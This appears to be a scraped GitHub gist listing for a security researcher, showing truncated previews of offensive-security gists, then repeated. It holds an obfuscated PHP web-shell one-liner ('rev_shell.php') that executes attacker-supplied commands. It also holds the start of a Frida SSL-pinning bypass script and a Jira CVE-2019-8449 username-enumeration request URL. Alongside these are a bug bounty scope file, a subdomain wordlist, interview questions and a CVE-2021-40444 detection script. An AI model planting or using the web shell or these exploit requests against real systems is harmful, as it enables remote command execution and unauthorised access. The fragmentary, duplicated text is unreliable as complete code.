GH0ST_3exP10it 0xSojalSec

## rev_shell.php
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;

/*
 *   In terminal:
 *       $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
 *   This is how the code will be produced, \xa0\xb8\xba\xab will be
 *   treated as constant therefore no " needed. It is also not copyable
 *   string because of non-ascii characters
 *
 *   Explanation:

## juicy.sh
#!/bin/sh
#tomnomnom juicy files https://gist.github.com/tomnomnom/57af04c3422aac8c6f04451a4c1daa51
# ffuf tool https://github.com/ffuf/ffuf
# put the ffuf bin at /usr/local/bin and give the juicy.sh permission to execute with chmod +x juicy.sh and copy to
# /usr/local/bin too.. after that.. execute juicy.sh at any terminal.
# usage bash juicy.sh filename.txt

filename="$1"
while read -r line; do
    name="$line"

## mixunpin.js
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);

/**
 * by incogbyte
 * Common functions
 * thx apkunpacker, NVISOsecurity, TheDauntless
 * Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
 * !!! THIS SCRIPT IS NOT A SILVER BULLET !!

## bounty_wildcards.json
{
  "programs": [
    {
      "name": "spacex",
      "url": "https://bugcrowd.com/spacex",
      "wildcards": [
        "starlink.com",
        "starlinkisp.net"
      ],
      "out_of_scope_domains": [],

## Jira bug-exploit


cve-2019-8449
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
 https://jira.atlassian.com/browse/JRASERVER-69796
 https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
=====================================================================================================================================

## google-dorks

"          _                      _          "
"   _     /||       .   .        ||\     _   "
"  ( }    \||D    '   '     '   C||/    { %  "
" | /\__,=_[_]   '  .   . '       [_]_=,__/\ |"
" |_\_  |----|                    |----|  _/_|"
" |  |/ |    |                    |    | \|  |"
" |  /_ |    |                    |    | _\  |"

	It is all fun and games until someone gets hacked!

## gist:87bd6be4e0ff1c087bbfae33c36c38d3
acc
accept
acceptatie
access
accounts
alpha
alt
api
app
apps

## Security Engineer - Interview Questions.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                0xSojalSec
                / Security Engineer - Interview Questions.md
            
            
              Created
              August 22, 2022 12:27
                — forked from namishelex01/Security Engineer - Interview Questions.md
            
              
                Cyber security engineer, Security Engineer, Security Analyst, Information Security Analyst and many more names
              
          
    Core Information Security


What is information security and how is it achieved?


What are the core principles of information security?


What is the CIA triangle?


What is non-repudiation (as it applies to IT security)?


## Security Interview Questions


Cyber Security is an exotic field, and every next person wants to explore this domain and make a career in it, but the problem is they have no idea how to get in and even if they do, They don’t have any idea on what type of questions they might face in an interview.


Recently
@Miss_Malware
 asked for everyone’s favourites security analyst and DFIR interview question that gave me an idea to compile a list of questions which are asked in every interview one way or another. What follows is a list of questions which you may face in an interview.

## detect_CVE-2021-40444.py
# simple script to detect CVE-2021-40444 exploits in DOCX using oletools
# v0.01 Philippe Lagadec 2021-09-09

# IMPORTANT NOTE: this script detects the few samples identified so far, by looking for "mhtml:" in remote objects URLs.
# But it is not confirmed yet if this detection is generic enough, for example if "mhtml:" is not mandatory.
# Moreover, for now only Office 2007+ files are supported.
# Detection for other file types (RTF, Office 97-2003, ...) will be implemented later.

import sys, zipfile
from oletools import oleobj, ooxml
	<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;

	/*
	* In terminal:
	* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
	* This is how the code will be produced, \xa0\xb8\xba\xab will be
	* treated as constant therefore no " needed. It is also not copyable
	* string because of non-ascii characters
	*
	* Explanation:
	#!/bin/sh
	#tomnomnom juicy files https://gist.github.com/tomnomnom/57af04c3422aac8c6f04451a4c1daa51
	# ffuf tool https://github.com/ffuf/ffuf
	# put the ffuf bin at /usr/local/bin and give the juicy.sh permission to execute with chmod +x juicy.sh and copy to
	# /usr/local/bin too.. after that.. execute juicy.sh at any terminal.
	# usage bash juicy.sh filename.txt

	filename="$1"
	while read -r line; do
	name="$line"
	console.log("[*] SSL Pinning Bypasses");
	console.log(`[*] Your frida version: ${Frida.version}`);
	console.log(`[*] Your script runtime: ${Script.runtime}`);

	/**
	* by incogbyte
	* Common functions
	* thx apkunpacker, NVISOsecurity, TheDauntless
	* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
	* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
	{
	"programs": [
	{
	"name": "spacex",
	"url": "https://bugcrowd.com/spacex",
	"wildcards": [
	"starlink.com",
	"starlinkisp.net"
	],
	"out_of_scope_domains": [],





	cve-2019-8449
	The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
	https://jira.atlassian.com/browse/JRASERVER-69796
	https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
	=====================================================================================================================================

	" _ _ "
	" _ /\|\| . . \|\|\ _ "
	" ( } \\|\|D ' ' ' C\|\|/ { % "
	" \| /\__,=_[_] ' . . ' [_]_=,__/\ \|"
	" \|_\_ \|----\| \|----\| _/_\|"
	" \| \|/ \| \| \| \| \\| \|"
	" \| /_ \| \| \| \| _\ \|"

	It is all fun and games until someone gets hacked!



	Cyber Security is an exotic field, and every next person wants to explore this domain and make a career in it, but the problem is they have no idea how to get in and even if they do, They don’t have any idea on what type of questions they might face in an interview.


	Recently
	@Miss_Malware
	asked for everyone’s favourites security analyst and DFIR interview question that gave me an idea to compile a list of questions which are asked in every interview one way or another. What follows is a list of questions which you may face in an interview.
	# simple script to detect CVE-2021-40444 exploits in DOCX using oletools
	# v0.01 Philippe Lagadec 2021-09-09

	# IMPORTANT NOTE: this script detects the few samples identified so far, by looking for "mhtml:" in remote objects URLs.
	# But it is not confirmed yet if this detection is generic enough, for example if "mhtml:" is not mandatory.
	# Moreover, for now only Office 2007+ files are supported.
	# Detection for other file types (RTF, Office 97-2003, ...) will be implemented later.

	import sys, zipfile
	from oletools import oleobj, ooxml